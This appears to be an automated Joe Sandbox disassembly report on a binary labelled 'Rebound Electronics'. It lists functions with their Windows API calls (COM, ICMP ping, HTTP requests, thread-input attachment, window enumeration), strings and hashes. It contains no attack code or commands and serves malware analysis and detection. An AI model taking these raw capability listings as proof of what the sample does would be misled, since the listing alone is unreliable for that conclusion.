Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: fccaec056f8522deb07f5cd9a99c428b11c459033acb11c3e2c5624834bf6ec4
Instruction ID: 64c4e6955ff0a856292951a3eb1e4faa2223b077b5501a1335ced1feb311ae2c
Opcode Fuzzy Hash: fccaec056f8522deb07f5cd9a99c428b11c459033acb11c3e2c5624834bf6ec4
Instruction Fuzzy Hash: 21412D75900219EFCB01DFA4D888ADEBB79FF08355F408065F913A3251DB30AA89DBA5

Function 00C7ADAE Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON

Download Yara Rule

APIs

Part of subcall function 00C2936C: __swprintf.LIBCMT ref: 00C293AB
Part of subcall function 00C2936C: __itow.LIBCMT ref: 00C293DF

CoInitialize.OLE32 ref: 00C7ADF6
CoUninitialize.OLE32 ref: 00C7AE01
CoCreateInstance.OLE32(?,00000000,00000017,00CAD8FC,?), ref: 00C7AE61
IIDFromString.OLE32(?,?), ref: 00C7AED4
VariantInit.OLEAUT32(?), ref: 00C7AF6E
VariantClear.OLEAUT32(?), ref: 00C7AFCF

Strings

Failed to create object, xrefs: 00C7AE6C, 00C7AF22
Invalid parameter, xrefs: 00C7AEED
NULL Pointer assignment, xrefs: 00C7AEA6

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 834269672-1287834457
Opcode ID: 529aafad9f273a50da42acdfed685dc4e434abeeb76305bd896f86cc085d338b
Instruction ID: 042c9c90bd567fc59e503eeb149e38bc1d290e4e77688d39b5d7c67d98c7e056
Opcode Fuzzy Hash: 529aafad9f273a50da42acdfed685dc4e434abeeb76305bd896f86cc085d338b
Instruction Fuzzy Hash: 8A619E70208311AFD710DF64D888B6EB7E8EF89714F108519F98A9B2A1C770EE44CB93

Function 00C78107 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00C78168
inet_addr.WSOCK32(?,?,?), ref: 00C781AD
gethostbyname.WSOCK32(?), ref: 00C781B9
IcmpCreateFile.IPHLPAPI ref: 00C781C7
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00C78237
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00C7824D
IcmpCloseHandle.IPHLPAPI(00000000), ref: 00C782C2
WSACleanup.WSOCK32 ref: 00C782C8

Strings

Ping, xrefs: 00C781EB

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: 8671a2cc3a365d5876aa0b7e83ad78aa2f0891f587511dc90c803b78ad1bafbc
Instruction ID: 954969f26bd8429e4d47e5fdc6bb381d6633d087650b25a3f8678b6b6e920556
Opcode Fuzzy Hash: 8671a2cc3a365d5876aa0b7e83ad78aa2f0891f587511dc90c803b78ad1bafbc
Instruction Fuzzy Hash: 6B51B3316447019FD710AF65DC89B2E7BE4EF45720F048819FA6AD72A1DB30E905DB42

Function 00C6E389 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 97COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00C6E396
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00C6E40C
GetLastError.KERNEL32 ref: 00C6E416
SetErrorMode.KERNEL32(00000000,READY), ref: 00C6E483

Strings

INVALID, xrefs: 00C6E455
READONLY, xrefs: 00C6E44E
UNKNOWN, xrefs: 00C6E43B
NOTREADY, xrefs: 00C6E442
READY, xrefs: 00C6E45C

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: 8d3f16287b5a6af31c9ef8e8a66470c67133c6db81c3e71588cc523eaffab89c
Instruction ID: 281601eba8c4c21c1348c85d584c1448a297ffbdd369e2cecc3628e13ba3a4e0
Opcode Fuzzy Hash: 8d3f16287b5a6af31c9ef8e8a66470c67133c6db81c3e71588cc523eaffab89c
Instruction Fuzzy Hash: 10317239A002099FDB21EBA4D8C5BBDB7B4EF45304F148026E516EB291DB70EA01DB91

Function 00C5B907 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00C5B98C
GetDlgCtrlID.USER32 ref: 00C5B997
GetParent.USER32 ref: 00C5B9B3
SendMessageW.USER32(00000000,?,00000111,?), ref: 00C5B9B6
GetDlgCtrlID.USER32(?), ref: 00C5B9BF
GetParent.USER32(?), ref: 00C5B9DB
SendMessageW.USER32(00000000,?,?,00000111), ref: 00C5B9DE

Strings

ListBox, xrefs: 00C5B949
ComboBox, xrefs: 00C5B911

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: MessageSend$CtrlParent
String ID: ComboBox$ListBox
API String ID: 1383977212-1403004172
Opcode ID: 60ec7b415d9446dbe7a75e242fdcb210d8c09126df564a44112fd08e10ad4e1f
Instruction ID: 929144d6a5866e987b0e62e31451fe5a598d58994c95f0a0adc7da5309018653
Opcode Fuzzy Hash: 60ec7b415d9446dbe7a75e242fdcb210d8c09126df564a44112fd08e10ad4e1f
Instruction Fuzzy Hash: 0221C874900204BFDB04ABA4DC85FFEBB75EF56301F100115FA62972D1DB745959EB24

Function 00C5B9F0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 80windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00C5BA73
GetDlgCtrlID.USER32 ref: 00C5BA7E
GetParent.USER32 ref: 00C5BA9A
SendMessageW.USER32(00000000,?,00000111,?), ref: 00C5BA9D
GetDlgCtrlID.USER32(?), ref: 00C5BAA6
GetParent.USER32(?), ref: 00C5BAC2
SendMessageW.USER32(00000000,?,?,00000111), ref: 00C5BAC5

Strings

ListBox, xrefs: 00C5BA32
ComboBox, xrefs: 00C5B9FA

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: MessageSend$CtrlParent
String ID: ComboBox$ListBox
API String ID: 1383977212-1403004172
Opcode ID: bafc30d186efa22787d375eccd3686cdd2301525238ebfbaaf492f5b2e32235e
Instruction ID: e538832f256b95389db8309596782ec34aa2754601bbe8a5f2849ad762e78d23
Opcode Fuzzy Hash: bafc30d186efa22787d375eccd3686cdd2301525238ebfbaaf492f5b2e32235e
Instruction Fuzzy Hash: 2321C2B8A00208BFDB04AFA4CC85FFEBB79EF55301F100015F952A7291DBB55959EB24

Function 00C5BAD7 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 71windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 00C5BAE3
GetClassNameW.USER32(00000000,?,00000100), ref: 00C5BAF8
_wcscmp.LIBCMT ref: 00C5BB0A
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00C5BB85

Strings

largeicons, xrefs: 00C5BB19
smallicons, xrefs: 00C5BB4D
list, xrefs: 00C5BB67
SHELLDLL_DefView, xrefs: 00C5BB04
details, xrefs: 00C5BB33

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: ClassMessageNameParentSend_wcscmp
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1704125052-3381328864
Opcode ID: 718a28237a0180a0a5dbe1d86218500884bb15b7b25c1f10b2a8d597aa0079e8
Instruction ID: 656470049c27c59c32d697aa1ca6e22a532ddbd8e8e7f1b67967fe57855965a7
Opcode Fuzzy Hash: 718a28237a0180a0a5dbe1d86218500884bb15b7b25c1f10b2a8d597aa0079e8
Instruction Fuzzy Hash: D611067A648703FBFA246625DC07EA63B9CDB21724B200032FE19E50D5FBE16D956528

Function 00C7B2A9 Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00C7B2D5
CoInitialize.OLE32(00000000), ref: 00C7B302
CoUninitialize.OLE32 ref: 00C7B30C
GetRunningObjectTable.OLE32(00000000,?), ref: 00C7B40C
SetErrorMode.KERNEL32(00000001,00000029), ref: 00C7B539
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002), ref: 00C7B56D
CoGetObject.OLE32(?,00000000,00CAD91C,?), ref: 00C7B590
SetErrorMode.KERNEL32(00000000), ref: 00C7B5A3
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00C7B623
VariantClear.OLEAUT32(00CAD91C), ref: 00C7B633

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
String ID:
API String ID: 2395222682-0
Opcode ID: 00f3df40d167a70867dac3806def41767a90d6440ede4f5e5c55051ca30a7bf5
Instruction ID: 079cfcd6f9c66c027e3919b96c8a07e371dab19c76727bc5ee838c3cc9f10948
Opcode Fuzzy Hash: 00f3df40d167a70867dac3806def41767a90d6440ede4f5e5c55051ca30a7bf5
Instruction Fuzzy Hash: 68C112B1608305AFC700DF65C884A6BB7E9FF89308F04895DF98A9B261DB71ED45CB52

Function 00C4ACB3 Relevance: 15.2, APIs: 10, Instructions: 219COMMON

Download Yara Rule

APIs

__lock.LIBCMT ref: 00C4ACC1

Part of subcall function 00C47CF4: __mtinitlocknum.LIBCMT ref: 00C47D06
Part of subcall function 00C47CF4: EnterCriticalSection.KERNEL32(00000000,?,00C47ADD,0000000D), ref: 00C47D1F

__calloc_crt.LIBCMT ref: 00C4ACD2

Part of subcall function 00C46986: __calloc_impl.LIBCMT ref: 00C46995
Part of subcall function 00C46986: Sleep.KERNEL32(00000000,000003BC,00C3F507,?,0000000E), ref: 00C469AC

@_EH4_CallFilterFunc@8.LIBCMT ref: 00C4ACED
GetStartupInfoW.KERNEL32(?,00CD6E28,00000064,00C45E91,00CD6C70,00000014), ref: 00C4AD46
__calloc_crt.LIBCMT ref: 00C4AD91
GetFileType.KERNEL32(00000001), ref: 00C4ADD8
InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 00C4AE11

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
String ID:
API String ID: 1426640281-0
Opcode ID: 345de3ba94b2c331de2c2e9f6f643d10b112443118e57a914de428afd06d0fad
Instruction ID: 8459468534492445e2b328f598340e85d9d8e94bf00e3d000ab5d8609f3804a8
Opcode Fuzzy Hash: 345de3ba94b2c331de2c2e9f6f643d10b112443118e57a914de428afd06d0fad
Instruction Fuzzy Hash: 1B81B2719453458FDB14CFA8C8806ADBBF0BF0A324B24426DE4B6AB3D1D7349943DB56

Function 00C667E9 Relevance: 15.1, APIs: 10, Instructions: 107windowCOMMON

Download Yara Rule

APIs

__swprintf.LIBCMT ref: 00C667FD
__swprintf.LIBCMT ref: 00C6680A

Part of subcall function 00C4172B: __woutput_l.LIBCMT ref: 00C41784

FindResourceW.KERNEL32(?,?,0000000E), ref: 00C66834
LoadResource.KERNEL32(?,00000000), ref: 00C66840
LockResource.KERNEL32(00000000), ref: 00C6684D
FindResourceW.KERNEL32(?,?,00000003), ref: 00C6686D
LoadResource.KERNEL32(?,00000000), ref: 00C6687F
SizeofResource.KERNEL32(?,00000000), ref: 00C6688E
LockResource.KERNEL32(?), ref: 00C6689A
CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00C668F9

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
String ID:
API String ID: 1433390588-0
Opcode ID: 19e149f4148b98965fb7becc7a9b273d6977d929812377593db81ef62efc0e32
Instruction ID: 7e267cd444e31fd278d9968817235d059c7032c946514cfa6cebdba555780aed
Opcode Fuzzy Hash: 19e149f4148b98965fb7becc7a9b273d6977d929812377593db81ef62efc0e32
Instruction Fuzzy Hash: D6318EB190025AABDB209F71DD85BBE7BA8FF09344B044525F913D7190E730DE61DBA0

Function 00C64025 Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00C64047
GetForegroundWindow.USER32(00000000,?,?,?,?,?,00C630A5,?,00000001), ref: 00C6405B
GetWindowThreadProcessId.USER32(00000000), ref: 00C64062
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00C630A5,?,00000001), ref: 00C64071
GetWindowThreadProcessId.USER32(?,00000000), ref: 00C64083
AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00C630A5,?,00000001), ref: 00C6409C
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00C630A5,?,00000001), ref: 00C640AE
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00C630A5,?,00000001), ref: 00C640F3
AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00C630A5,?,00000001), ref: 00C64108
AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00C630A5,?,00000001), ref: 00C64113

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: fbdd93e1130bf47194148ac9aacab74b8c34d83c567f9b39abbb96120293c38b
Instruction ID: d9ed3fad28630167fd66743a924a0b0c843f899f78db0e36967ef78fb0eb97b4
Opcode Fuzzy Hash: fbdd93e1130bf47194148ac9aacab74b8c34d83c567f9b39abbb96120293c38b
Instruction Fuzzy Hash: 6231A2B1500254EFDB24DF55DCCAB7D77A9BB56316F208105F916EB290CBB4EE808B60

Function 00C9DD4A Relevance: 15.1, APIs: 10, Instructions: 59windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 00C3B496
SetTextColor.GDI32(?,000000FF), ref: 00C3B4A0
SetBkMode.GDI32(?,00000001), ref: 00C3B4B5
GetStockObject.GDI32(00000005), ref: 00C3B4BD
GetClientRect.USER32(?), ref: 00C9DD63
SendMessageW.USER32(?,00001328,00000000,?), ref: 00C9DD7A
GetWindowDC.USER32(?), ref: 00C9DD86
GetPixel.GDI32(00000000,?,?), ref: 00C9DD95
ReleaseDC.USER32(?,00000000), ref: 00C9DDA7
GetSysColor.USER32(00000005), ref: 00C9DDC5

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
String ID:
API String ID: 3430376129-0
Opcode ID: 7951a1a2fe85220fcb9c62b376d0bce8f0b3247f5d03731963c1bdfbc96031f2
Instruction ID: e63034e1193df3490db8f65d670906b4e563f69f59e296d193ef9197f3689c42
Opcode Fuzzy Hash: 7951a1a2fe85220fcb9c62b376d0bce8f0b3247f5d03731963c1bdfbc96031f2
Instruction Fuzzy Hash: 84114971500205AFDB216FA4EC08BED7B61EB06329F108665FA67A64E2CB320A41DB20

Function 00C5CB82 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 239COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32(?,00C5CF50), ref: 00C5CE90

Strings

CLASS, xrefs: 00C5CC10
TEXT, xrefs: 00C5CDC7
NAME, xrefs: 00C5CCC2
INSTANCE, xrefs: 00C5CD9E
REGEXPCLASS, xrefs: 00C5CC56
CLASSNN, xrefs: 00C5CC33

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: ChildEnumWindows
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 3555792229-1603158881
Opcode ID: bf2ae84782040861bb01ab3002aace6ff77ceb006f458f0e102a348833d00170
Instruction ID: c1959dc20598edf6b3e485ec485c5b83175764efcdeb89621ffaaec84d6aff6e
Opcode Fuzzy Hash: bf2ae84782040861bb01ab3002aace6ff77ceb006f458f0e102a348833d00170
Instruction Fuzzy Hash: 6B919234500606AFCB18DF60C4C2BEDFB75BF04300F54851AE95AA7191DF706A9EDBA4

Function 00C23093 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 210COMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00C230DC
CoUninitialize.OLE32(?,00000000), ref: 00C23181
UnregisterHotKey.USER32(?), ref: 00C232A9
DestroyWindow.USER32(?), ref: 00C95079
FreeLibrary.KERNEL32(?), ref: 00C950F8
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00C95125

Strings

close all, xrefs: 00C230D7

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: c2455c1acc595ed13c1e6978040f4e75d4d1714833b36b58741db59399b6434b
Instruction ID: 61e414ffacfd95f07ded7d7933975b95410a27096d63d24f5b6bcdfec47c2337
Opcode Fuzzy Hash: c2455c1acc595ed13c1e6978040f4e75d4d1714833b36b58741db59399b6434b
Instruction Fuzzy Hash: 2C913B34700262CFCB06EF14E999B68F3A4FF05304F5441A9E50AA7A62DF34AE66DF54

Function 00C3CB8D Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 185windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 00C3CC15

Part of subcall function 00C3CCCD: GetClientRect.USER32(?,?), ref: 00C3CCF6
Part of subcall function 00C3CCCD: GetWindowRect.USER32(?,?), ref: 00C3CD37
Part of subcall function 00C3CCCD: ScreenToClient.USER32(?,?), ref: 00C3CD5F

GetDC.USER32 ref: 00C9D137
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00C9D14A
SelectObject.GDI32(00000000,00000000), ref: 00C9D158
SelectObject.GDI32(00000000,00000000), ref: 00C9D16D
ReleaseDC.USER32(?,00000000), ref: 00C9D175
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00C9D200

Strings

U, xrefs: 00C9D0D5

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: 0dc66245bdb668f9c5caed452261e549ca37ff2d50071c60da43e4171963bd5b
Instruction ID: ee3a1efa171e93529aa7890e3edd440458e79394c819e4fb088cb3d398931c29
Opcode Fuzzy Hash: 0dc66245bdb668f9c5caed452261e549ca37ff2d50071c60da43e4171963bd5b
Instruction Fuzzy Hash: BE71CD31400205DFCF219F64DC89AEE7BB5FF49324F184269FD666A2A6C7318E51DB60

Function 00C745C4 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 133networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00C745FF
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00C7462B
InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00C7466D
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00C74682
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00C7468F
